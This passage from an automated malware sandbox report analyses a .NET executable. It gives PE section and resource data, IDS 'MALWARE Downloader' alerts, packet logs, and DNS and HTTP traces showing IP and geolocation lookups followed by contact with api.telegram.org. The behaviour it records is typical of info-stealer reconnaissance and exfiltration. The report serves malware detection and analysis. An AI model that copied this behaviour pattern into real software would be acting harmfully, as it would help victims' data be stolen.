IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xeb144	0xeb200	1ab72a00975e94296615e0da6370ebad	False	0.7759077202950558	data	7.509647652044103	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xee000	0x4880	0x4a00	f8ce2893ff260a30ee50c9548d56b312	False	0.26974239864864863	data	4.833854197506547	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xf4000	0xc	0x200	9dfeb61c4d7eefcf31230fcc3898a314	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xee0e8	0x4460	Device independent bitmap graphic, 71 x 118 x 32, image size 16756, resolution 3779 x 3779 px/m	0.26433957952468007
RT_GROUP_ICON	0xf2548	0x14	data	1.1
RT_VERSION	0xf255c	0x324	data	0.43407960199004975

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-29T10:16:06.456638+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49739	158.101.44.242	80	TCP
2024-10-29T10:16:08.650515+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49733	158.101.44.242	80	TCP
2024-10-29T10:16:09.994125+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49733	158.101.44.242	80	TCP
2024-10-29T10:16:10.975023+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49737	188.114.97.3	443	TCP
2024-10-29T10:16:12.465520+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49742	188.114.97.3	443	TCP
2024-10-29T10:16:13.166004+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49743	158.101.44.242	80	TCP
2024-10-29T10:16:13.877740+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49744	188.114.97.3	443	TCP
2024-10-29T10:16:14.712887+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49745	158.101.44.242	80	TCP
2024-10-29T10:16:15.450706+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49746	188.114.97.3	443	TCP
2024-10-29T10:16:16.447298+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49747	158.101.44.242	80	TCP
2024-10-29T10:16:17.151406+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49748	188.114.97.3	443	TCP
2024-10-29T10:16:18.384798+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49749	158.101.44.242	80	TCP
2024-10-29T10:16:20.431866+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49751	158.101.44.242	80	TCP
2024-10-29T10:16:21.186445+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49753	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 29, 2024 10:16:06.500916958 CET	49733	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:06.506397963 CET	80	49733	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:06.506530046 CET	49733	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:06.506767035 CET	49733	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:06.512096882 CET	80	49733	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:08.414607048 CET	80	49733	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:08.415159941 CET	80	49733	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:08.415343046 CET	49733	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:08.445292950 CET	49733	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:08.451992035 CET	80	49733	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:08.601571083 CET	80	49733	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:08.650515079 CET	49733	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:08.705781937 CET	49734	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:08.705830097 CET	443	49734	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:08.705939054 CET	49734	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:08.758701086 CET	49734	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:08.758739948 CET	443	49734	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:09.373915911 CET	443	49734	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:09.374032974 CET	49734	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:09.445524931 CET	49734	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:09.445585966 CET	443	49734	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:09.445971012 CET	443	49734	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:09.494118929 CET	49734	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:09.573149920 CET	49734	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:09.615334988 CET	443	49734	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:09.709852934 CET	443	49734	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:09.709923029 CET	443	49734	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:09.710009098 CET	49734	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:09.746364117 CET	49734	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:09.759854078 CET	49733	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:09.765394926 CET	80	49733	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:09.942194939 CET	80	49733	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:09.944390059 CET	49736	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:09.944426060 CET	443	49736	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:09.944583893 CET	49736	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:09.944848061 CET	49736	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:09.944863081 CET	443	49736	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:09.957366943 CET	443	49736	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:09.994124889 CET	49733	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:10.052905083 CET	49737	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:10.052958965 CET	443	49737	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:10.053092957 CET	49737	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:10.053483009 CET	49737	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:10.053497076 CET	443	49737	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:10.661331892 CET	443	49737	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:10.661428928 CET	49737	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:10.663096905 CET	49737	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:10.663115978 CET	443	49737	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:10.663460970 CET	443	49737	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:10.665107965 CET	49737	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:10.707333088 CET	443	49737	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:10.974994898 CET	443	49737	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:10.975063086 CET	443	49737	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:10.975136042 CET	49737	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:10.975614071 CET	49737	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:10.979266882 CET	49733	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:10.980432034 CET	49739	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:10.985064983 CET	80	49733	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:10.985131025 CET	49733	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:10.986280918 CET	80	49739	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:10.986490011 CET	49739	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:10.986588001 CET	49739	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:10.992024899 CET	80	49739	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:10.993021965 CET	80	49739	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:10.994834900 CET	49740	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:11.000251055 CET	80	49740	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:11.000344038 CET	49740	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:11.000451088 CET	49740	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:11.005954027 CET	80	49740	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:11.006078005 CET	80	49740	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:11.024477959 CET	49741	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:11.030044079 CET	80	49741	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:11.030118942 CET	49741	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:11.030241966 CET	49741	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:11.035550117 CET	80	49741	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:11.703902960 CET	80	49741	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:11.705270052 CET	49742	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:11.705341101 CET	443	49742	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:11.705439091 CET	49742	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:11.705730915 CET	49742	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:11.705768108 CET	443	49742	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:11.759733915 CET	49741	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:12.315445900 CET	443	49742	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:12.317548990 CET	49742	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:12.317583084 CET	443	49742	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:12.465512991 CET	443	49742	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:12.465601921 CET	443	49742	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:12.465842009 CET	49742	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:12.466218948 CET	49742	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:12.469357014 CET	49741	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:12.470551014 CET	49743	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:12.475397110 CET	80	49741	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:12.475455046 CET	49741	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:12.476243019 CET	80	49743	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:12.476306915 CET	49743	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:12.476404905 CET	49743	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:12.482304096 CET	80	49743	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:13.119854927 CET	80	49743	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:13.121270895 CET	49744	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:13.121310949 CET	443	49744	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:13.124002934 CET	49744	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:13.124228001 CET	49744	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:13.124233961 CET	443	49744	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:13.166003942 CET	49743	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:13.735807896 CET	443	49744	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:13.737711906 CET	49744	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:13.737755060 CET	443	49744	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:13.877790928 CET	443	49744	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:13.877873898 CET	443	49744	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:13.877970934 CET	49744	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:13.880501032 CET	49744	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:13.883757114 CET	49743	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:13.884741068 CET	49745	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:13.889573097 CET	80	49743	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:13.889655113 CET	49743	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:13.891077995 CET	80	49745	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:13.891155958 CET	49745	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:13.891400099 CET	49745	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:13.897011995 CET	80	49745	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:14.668852091 CET	80	49745	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:14.670597076 CET	49746	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:14.670665979 CET	443	49746	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:14.670788050 CET	49746	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:14.671019077 CET	49746	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:14.671030998 CET	443	49746	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:14.712887049 CET	49745	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:15.276741028 CET	443	49746	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:15.312537909 CET	49746	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:15.312589884 CET	443	49746	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:15.450709105 CET	443	49746	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:15.450788021 CET	443	49746	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:15.450848103 CET	49746	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:15.451277971 CET	49746	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:15.454937935 CET	49745	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:15.456144094 CET	49747	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:15.462776899 CET	80	49745	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:15.462862968 CET	49745	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:15.462912083 CET	80	49747	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:15.462974072 CET	49747	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:15.463066101 CET	49747	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:15.469985008 CET	80	49747	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:16.395612001 CET	80	49747	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:16.397300959 CET	49748	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:16.397350073 CET	443	49748	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:16.397450924 CET	49748	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:16.397706032 CET	49748	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:16.397718906 CET	443	49748	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:16.447298050 CET	49747	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:17.010099888 CET	443	49748	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:17.011629105 CET	49748	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:17.011658907 CET	443	49748	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:17.151432037 CET	443	49748	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:17.151511908 CET	443	49748	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:17.151576042 CET	49748	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:17.152060986 CET	49748	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:17.155100107 CET	49747	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:17.156299114 CET	49749	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:17.160896063 CET	80	49747	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:17.160942078 CET	49747	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:17.161663055 CET	80	49749	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:17.161725998 CET	49749	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:17.161813974 CET	49749	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:17.167076111 CET	80	49749	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:18.344528913 CET	80	49749	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:18.345810890 CET	49750	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:18.345845938 CET	443	49750	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:18.345916033 CET	49750	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:18.346153975 CET	49750	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:18.346165895 CET	443	49750	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:18.384798050 CET	49749	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:18.951999903 CET	443	49750	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:18.952027082 CET	443	49750	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:18.952094078 CET	49750	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:18.952120066 CET	443	49750	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:18.956496000 CET	49750	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:18.956501961 CET	443	49750	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:19.079550028 CET	443	49750	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:19.083159924 CET	49750	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:19.083193064 CET	443	49750	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:19.217904091 CET	443	49750	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:19.221805096 CET	49749	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:19.222930908 CET	49751	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:19.227842093 CET	80	49749	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:19.227904081 CET	49749	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:19.228332043 CET	80	49751	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:19.228414059 CET	49751	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:19.228502035 CET	49751	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:19.233805895 CET	80	49751	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:19.259771109 CET	49750	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:20.390041113 CET	80	49751	158.101.44.242	192.168.2.4
Oct 29, 2024 10:16:20.390721083 CET	49750	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:20.390866041 CET	443	49750	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:20.390918970 CET	49750	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:20.391946077 CET	49753	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:20.391980886 CET	443	49753	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:20.392792940 CET	49753	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:20.392793894 CET	49753	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:20.392828941 CET	443	49753	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:20.431865931 CET	49751	80	192.168.2.4	158.101.44.242
Oct 29, 2024 10:16:21.030540943 CET	443	49753	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:21.030679941 CET	49753	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:21.032166004 CET	49753	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:21.032176971 CET	443	49753	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:21.032494068 CET	443	49753	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:21.037389040 CET	49753	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:21.083333969 CET	443	49753	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:21.186425924 CET	443	49753	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:21.186489105 CET	443	49753	188.114.97.3	192.168.2.4
Oct 29, 2024 10:16:21.186573029 CET	49753	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:21.186947107 CET	49753	443	192.168.2.4	188.114.97.3
Oct 29, 2024 10:16:21.211118937 CET	49755	443	192.168.2.4	149.154.167.220
Oct 29, 2024 10:16:21.211148977 CET	443	49755	149.154.167.220	192.168.2.4
Oct 29, 2024 10:16:21.211211920 CET	49755	443	192.168.2.4	149.154.167.220
Oct 29, 2024 10:16:21.211657047 CET	49755	443	192.168.2.4	149.154.167.220
Oct 29, 2024 10:16:21.211673975 CET	443	49755	149.154.167.220	192.168.2.4
Oct 29, 2024 10:16:22.057451963 CET	443	49755	149.154.167.220	192.168.2.4
Oct 29, 2024 10:16:22.057523012 CET	49755	443	192.168.2.4	149.154.167.220
Oct 29, 2024 10:16:22.059274912 CET	49755	443	192.168.2.4	149.154.167.220
Oct 29, 2024 10:16:22.059283018 CET	443	49755	149.154.167.220	192.168.2.4
Oct 29, 2024 10:16:22.059521914 CET	443	49755	149.154.167.220	192.168.2.4
Oct 29, 2024 10:16:22.060826063 CET	49755	443	192.168.2.4	149.154.167.220
Oct 29, 2024 10:16:22.107321978 CET	443	49755	149.154.167.220	192.168.2.4
Oct 29, 2024 10:16:22.302647114 CET	443	49755	149.154.167.220	192.168.2.4
Oct 29, 2024 10:16:22.302716970 CET	443	49755	149.154.167.220	192.168.2.4
Oct 29, 2024 10:16:22.302804947 CET	49755	443	192.168.2.4	149.154.167.220
Oct 29, 2024 10:16:22.305875063 CET	49755	443	192.168.2.4	149.154.167.220
Oct 29, 2024 10:16:38.363260031 CET	49751	80	192.168.2.4	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 29, 2024 10:16:06.456638098 CET	58698	53	192.168.2.4	1.1.1.1
Oct 29, 2024 10:16:06.463939905 CET	53	58698	1.1.1.1	192.168.2.4
Oct 29, 2024 10:16:08.696321964 CET	57416	53	192.168.2.4	1.1.1.1
Oct 29, 2024 10:16:08.704788923 CET	53	57416	1.1.1.1	192.168.2.4
Oct 29, 2024 10:16:21.201504946 CET	59443	53	192.168.2.4	1.1.1.1
Oct 29, 2024 10:16:21.210530996 CET	53	59443	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 29, 2024 10:16:06.456638098 CET	192.168.2.4	1.1.1.1	0x61e4	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 29, 2024 10:16:08.696321964 CET	192.168.2.4	1.1.1.1	0xc33d	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 29, 2024 10:16:21.201504946 CET	192.168.2.4	1.1.1.1	0x2311	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 29, 2024 10:16:06.463939905 CET	1.1.1.1	192.168.2.4	0x61e4	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 29, 2024 10:16:06.463939905 CET	1.1.1.1	192.168.2.4	0x61e4	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 29, 2024 10:16:06.463939905 CET	1.1.1.1	192.168.2.4	0x61e4	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 29, 2024 10:16:06.463939905 CET	1.1.1.1	192.168.2.4	0x61e4	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 29, 2024 10:16:06.463939905 CET	1.1.1.1	192.168.2.4	0x61e4	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 29, 2024 10:16:06.463939905 CET	1.1.1.1	192.168.2.4	0x61e4	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 29, 2024 10:16:08.704788923 CET	1.1.1.1	192.168.2.4	0xc33d	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 29, 2024 10:16:08.704788923 CET	1.1.1.1	192.168.2.4	0xc33d	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 29, 2024 10:16:21.210530996 CET	1.1.1.1	192.168.2.4	0x2311	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	158.101.44.242	80	2720	C:\Users\user\Desktop\M2AB8BeHc4.exe

Timestamp	Bytes transferred	Direction	Data
Oct 29, 2024 10:16:06.506767035 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 29, 2024 10:16:08.414607048 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:16:08 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e1957d74ef1c816ff77f2d65f386e206 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>
Oct 29, 2024 10:16:08.415159941 CET	323	IN	HTTP/1.1 200 OK Date: Tue, 29 Oct 2024 09:16:08 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e1957d74ef1c816ff77f2d65f386e206 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>
Oct 29, 2024 10:16:08.445292950 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
